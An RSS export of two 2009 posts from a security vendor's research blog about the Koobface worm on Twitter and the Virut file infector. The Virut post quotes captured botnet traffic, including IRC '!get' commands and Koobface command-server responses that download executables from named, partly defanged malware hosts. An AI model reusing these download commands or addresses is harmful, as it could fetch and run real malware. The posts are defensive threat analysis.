<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>ThreatFire Research Blog &#187; Virut</title>
	<atom:link href="http://blog.threatfire.com/category/virut/feed" rel="self" type="application/rss+xml" />
	<link>http://blog.threatfire.com</link>
	<description>ThreatFire™ AntiVirus protects when others can&#039;t</description>
	<lastBuildDate>Mon, 15 Mar 2010 15:00:10 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>@stealyourmoney &#8212; TweetFace Has a Tinyurl 4u</title>
		<link>http://blog.threatfire.com/2009/07/stealyourmoney-tweetface-has-a-tinyurl-4u.html</link>
		<comments>http://blog.threatfire.com/2009/07/stealyourmoney-tweetface-has-a-tinyurl-4u.html#comments</comments>
		<pubDate>Fri, 10 Jul 2009 14:51:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Click Fraud]]></category>
		<category><![CDATA[Koobface]]></category>
		<category><![CDATA[Rogueware]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[Virut]]></category>

		<guid isPermaLink="false">http://newblog.threatfire.com/2009/07/stealyourmoney-tweetface-has-a-tinyurl-4u.html</guid>
		<description><![CDATA[Koobface joined the Twittersphere, and the Twittersphere is fighting back. It&#8217;s good to see response from the social networking infrastructure.
Koobface has been distributed in prevalence for around a year now, with the ThreatFire community confident all along that their information is safe from the threat. In other words, if you want to keep it off [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.usatoday.com/tech/news/computersecurity/2009-04-22-captcha-code-breakers_N.htm" target="_blank">Koobface</a> joined the Twittersphere, and the Twittersphere is fighting back. It&#8217;s good to see response from the social networking infrastructure.</p>
<p><a href="http://www.threatexpert.com/report.aspx?md5=976dbfa0d8d0614508be4053b4153d45" target="_blank">Koobface</a> has been distributed in prevalence for around a year now, with the ThreatFire community confident all along that their information is safe from the threat. In other words, if you want to keep it off of your system, careful of what you download and add a behavioral solution like <a href="http://www.threatfire.com" target="_blank">ThreatFire</a> to your system&#8217;s security layers.</p>
<p>The Koobface family has been distributed in a couple of ways since June/July 2008, increasing its prevalence to significant volumes in <a href="http://blog.threatfire.com/2008/12/koobface-on-loose-as-flashupdateexe.html" target="_blank">December</a> of last year. It started out as a standalone worm <a href="http://blog.threatexpert.com/2008/12/koobface-leaves-victims-black-spot.html" target="_blank">menacing</a> the massive volumes of social networking users across a handful of social networks, <a href="http://blog.threatexpert.com/2008/12/how-to-defeat-koobface.html" target="_blank">defeating </a><a href="http://blog.threatexpert.com/2008/12/how-to-defeat-koobface.html" target="_blank">captcha</a>, and downloading more malware to compromised systems. Now, it is more frequently  distributed as part of a malware package by attacking sites, alongside other payloads delivered by exploit pages hosted by malicious web sites: Virut, click fraud components, spambots (Waledac) and scareware. Koobface can be a secondary method of propagation for these various malware distribution groups.</p>
<p>So it was only a matter of time before the developers figured out that Twitter is another popular Web 2.0 medium. They also figured out that Tinyurl is one way to obfuscate malicious urls and distribute these urls across tweets.</p>
<p><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_YaXoRZbsXc4/Sldg4Ny_09I/AAAAAAAAA4Y/FY8fMnmG09g/s1600-h/Tweet.png" target="_blank"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 304px; height: 55px;" src="http://1.bp.blogspot.com/_YaXoRZbsXc4/Sldg4Ny_09I/AAAAAAAAA4Y/FY8fMnmG09g/s320/Tweet.png" alt="" id="BLOGGER_PHOTO_ID_5356856800672994258" border="0" /></a></p>
<p>These urls lead to the standard phony codec pages that is a trademark of the group. This time you&#8217;ll see &#8220;Video posted by -WizArD-&#8221;, the site remains up:</p>
<p><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_YaXoRZbsXc4/SldfHbhViAI/AAAAAAAAA4Q/havaCgceqDk/s1600-h/Video_posted_by_Wizard.png" target="_blank"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 261px;" src="http://4.bp.blogspot.com/_YaXoRZbsXc4/SldfHbhViAI/AAAAAAAAA4Q/havaCgceqDk/s320/Video_posted_by_Wizard.png" alt="" id="BLOGGER_PHOTO_ID_5356854863031797762" border="0" /></a></p>
<p>When setup.exe is downloaded and run from 98.217.161.163, the user of course does not install an Adobe Flash Player Update as promised. Instead, they get an updated version of the Koobface <a href="http://www.threatexpert.com/report.aspx?md5=976dbfa0d8d0614508be4053b4153d45" target="_blank">worm</a>. Along with the worm, the compromised system eventually is redirected to a <a href="http://www.threatexpert.com/report.aspx?md5=51371612196721b8dc1f28db96c29e26" target="_blank">FakeAv</a> offer, so the group can make its money:</p>
<p><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_YaXoRZbsXc4/SldkW0qaNkI/AAAAAAAAA4g/9y7GNPOQFvA/s1600-h/LameScan.png" target="_blank"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 251px;" src="http://3.bp.blogspot.com/_YaXoRZbsXc4/SldkW0qaNkI/AAAAAAAAA4g/9y7GNPOQFvA/s320/LameScan.png" alt="" id="BLOGGER_PHOTO_ID_5356860625036916290" border="0" /></a></p>
<p>This morning, accounts tweeting the &#8220;My home video <img src='http://blog.threatfire.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  &#8221; message with a tinyurl leading to the &#8220;Video posted by -Wizard-&#8221; are receiving some cleanup attention:</p>
<p><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_YaXoRZbsXc4/SldcbESi6lI/AAAAAAAAA4I/OdaPk63Utfs/s1600-h/MoseyAlongNow.png" target="_blank"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 278px;" src="http://4.bp.blogspot.com/_YaXoRZbsXc4/SldcbESi6lI/AAAAAAAAA4I/OdaPk63Utfs/s320/MoseyAlongNow.png" alt="" id="BLOGGER_PHOTO_ID_5356851901858245202" border="0" /></a></p>
<p>The Tinyurl has been disabled as well.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.threatfire.com/2009/07/stealyourmoney-tweetface-has-a-tinyurl-4u.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Virut Distributing Koobface, Ad-Clickers and Spambots</title>
		<link>http://blog.threatfire.com/2009/05/virut-distributing-koobface-ad-clickers-and-spambots.html</link>
		<comments>http://blog.threatfire.com/2009/05/virut-distributing-koobface-ad-clickers-and-spambots.html#comments</comments>
		<pubDate>Tue, 26 May 2009 22:46:00 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Adware]]></category>
		<category><![CDATA[Koobface]]></category>
		<category><![CDATA[Rootkit]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[Virut]]></category>

		<guid isPermaLink="false">http://newblog.threatfire.com/2009/05/virut-distributing-koobface-ad-clickers-and-spambots.html</guid>
		<description><![CDATA[Virut is a nasty file infector that has been actively updated and distributed for a few years. Yes, you read that correctly. Actively updated and distributed for a few years now. A system infected with this stuff often needs to be reformatted altogether. ThreatFire has been doing its part (for the past couple of years) [...]]]></description>
			<content:encoded><![CDATA[<p>Virut is a nasty file infector that has been actively updated and distributed for a few years. Yes, you read that correctly. Actively updated and distributed for a few years now. A system infected with this stuff often needs to be reformatted altogether. ThreatFire has been doing its part (for the past couple of years) to prevent the new variants on users&#8217; systems even when the traditional Av scanners have failed to keep up.</p>
<p>Are viruses the thing of yesteryear? Not at all. Is it another 29A, another group of kids looking for some thrills and recognition of their virus writing skills? No. What we find is that the hosting server, the downloads, and the multiple layers of effort are well orchestrated and financially motivated.</p>
<p>The family uses all sorts of tricks to distribute itself and many other components. Much has already been written on its changing infection, encryption, memory residence, injection, html file appending, and hooking techniques. But what is the group behind it up to now?<br />This summary will put together a few more key points on the threat&#8217;s current activity and its hosts. The threat itself comes from a number of servers and delivers a variety of malware. We&#8217;ll see that it is responsible for far more than infected files and Irc traffic, including adware, rootkits, password stealers, worms and spambots.</p>
<p>Virut&#8217;s current strain of executable infector is highly prevalent. The ThreatFire community has prevented tens of thousands of a couple of the newest Virut variants over the past couple of months. In fact, this executable infector is redeveloped quickly and often, and has been known to be buggy so that disinfection routines by the major Av vendors may end up corrupting the executable files that are meant to be cleaned when detected.</p>
<p>DO NOT VISIT THE MALICIOUS WEBSITES DESCRIBED HERE&#8230;</p>
<p>The first server that the current active Virut variant attempts to connect with is irc.zief.pl, oddly enough, over port 80 for its IRC session. It joins one of the channels there to receive private messages instructing it to download more malware:</p>
<p>NICK xxx<br />USER xxx. . :#xxx Service Pack 3<br />JOIN #.xxx</p>
<p>:u. PRIVMSG xxx:!get hxxp://cock.8866. org:88/files/adx.gif (Spyware downloader)<br />:u. PRIVMSG xxx:!get hxxp://dl.guarddog2009. com/cw.exe (<a href="http://www.threatexpert.com/report.aspx?md5=e8a03879d114dbaf7f796ed33e31d4a4" target="_blank">Koobface variant</a>)<br />:u. PRIVMSG xxx:!get hxxp://goasi. cn/ex/a.php (serves &#8220;load.exe&#8221; <a href="http://www.threatexpert.com/report.aspx?md5=73a5de7137d746c42501f19584415657" target="_blank">malicious downloader</a>)<br />:u. PRIVMSG xxx:!get hxxp://85.114.131. 69/ad2.exe (<a href="http://www.threatexpert.com/report.aspx?md5=499f68191358c70fad6fb6126befb3fe" target="_blank">malicious ad-popper</a>)<br />PING :l.<br />PONG :l.<br />PING :l.<br />PONG :l.</p>
<p>Of those domains, it is interesting that the &#8220;dl.guarddog2009.com&#8221; is actively serving Koobface worm variants and ad popupers, considering that they are peddling scareware/rogueware from the same ip. Avoid it:</p>
<p><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_YaXoRZbsXc4/Sh3Cmwxz1oI/AAAAAAAAA1Q/NuthaT7hKEE/s1600-h/dl.guarddog2009.com.png" target="_blank"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 226px;" src="http://2.bp.blogspot.com/_YaXoRZbsXc4/Sh3Cmwxz1oI/AAAAAAAAA1Q/NuthaT7hKEE/s320/dl.guarddog2009.com.png" alt="" id="BLOGGER_PHOTO_ID_5340638704315913858" border="0" /></a></p>
<p>Once running, these additional pieces of malware download other nastiness in the background:<br />hxxp://avhtm.8866. org/files/av.htm (<a href="http://www.threatexpert.com/report.aspx?md5=b699636fd417371ba34ae9545658f2c4" target="_blank">spambot dropper</a>)<br />a POST is sent to main15052009. com/achcheck.php<br />hxxp://74.52.164. 210/pk/bb021908.exe (<a href="http://www.threatexpert.com/report.aspx?md5=fd5c7c4623e7b4f314514d978c885edb" target="_blank">malicious downloader</a>)</p>
<p>another POST is sent up to main15052009. com/ld/gen.php, with a recognizable Koobface response:<br />#PID=xxx<br />START|hxxp://www.i-site. ph/1/6244.exe (<a href="http://www.threatexpert.com/report.aspx?md5=9f7bba0c5de7a66a958592e6fe6d6010" target="_blank">Bho dropper</a><a href="http://www.threatexpert.com/report.aspx?md5=4bf2a453fce39e60262bcb9859f7bda9" target="_blank">)</a><br />START|hxxp://www.i-site. ph/1/nfr.exe (<a href="http://www.threatexpert.com/report.aspx?md5=4bf2a453fce39e60262bcb9859f7bda9" target="_blank">proxy component</a>)<br />WAIT|120<br /><a href="http://blog.threatexpert.com/2008/12/koobface-leaves-victims-black-spot.html" target="_blank">#BLACKLABEL</a><br />EXIT</p>
<p>hxxp://ji-u. cn/506.exe  <--  hxxp://goasi. cn/dll/abb.txt <a href="http://www.threatexpert.com/report.aspx?md5=294d022a2c97342c24dbcc98527adc27" target="_blank">(renamed to reader_s.exe and run</a>, an updated Virut backdoor variant)</p>
<p>An unusual user-agent rears its head:<br />GET /ad2.exe HTTP/1.0 (malicious ad-popper listed above)<br />User-Agent: Download<br />Host: 85.114.131.69<br />Pragma: no-cache<br />(Incidentally, 85.114.131.69 is the host to s2.zief. pl and dl.guarddog2009. com.)</p>
<p>Additional files downloaded:<br />hxxp://ipkipk.3322. org/ipk.exe  (<a href="http://www.threatexpert.com/report.aspx?md5=9b5a63fda797bf1739f24a114b6e7419" target="_blank">downloader/adclick component</a>)<br />hxxp://xz.wanggui. com/mem322.exe<span style="text-decoration: underline;"> (</span><a href="http://www.threatexpert.com/report.aspx?md5=c5336fe6410a9a7fac06d3087f3340a7" target="_blank">downloader for password stealers</a>)<br />hxxp://www.dofulfill . net/loadersvc.exe</p>
<p>All the while, in the background, multiple phantom queries are sent out to multiple servers, in an effort to increase click traffic at various sites, including job sites.</p>
<p>And then comes the spam. Infected machines spew spam containing messages like<br />&#8220;If you don&#8217;t feel like a complete person because you can&#8217;t afford luxury things to look stylish and elegant, you can forget about this feeling. We offer you fantastic deals on fantastic watches.&#8221;<br />A link is included that takes you to a &#8220;group&#8221; at a major provider, where knockoff watches and bags appear to be for sale. A click on an image redirects the user to sites like &#8220;trylamp. com&#8221;. Often, other pieces of spam carry offers for pills of all kinds.</p>
<p><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_YaXoRZbsXc4/Sh3VjSSr1_I/AAAAAAAAA1Y/ucP0YVgyTf4/s1600-h/spam_watches.png" target="_blank"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 146px;" src="http://4.bp.blogspot.com/_YaXoRZbsXc4/Sh3VjSSr1_I/AAAAAAAAA1Y/ucP0YVgyTf4/s320/spam_watches.png" alt="" id="BLOGGER_PHOTO_ID_5340659535313623026" border="0" /></a></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.threatfire.com/2009/05/virut-distributing-koobface-ad-clickers-and-spambots.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
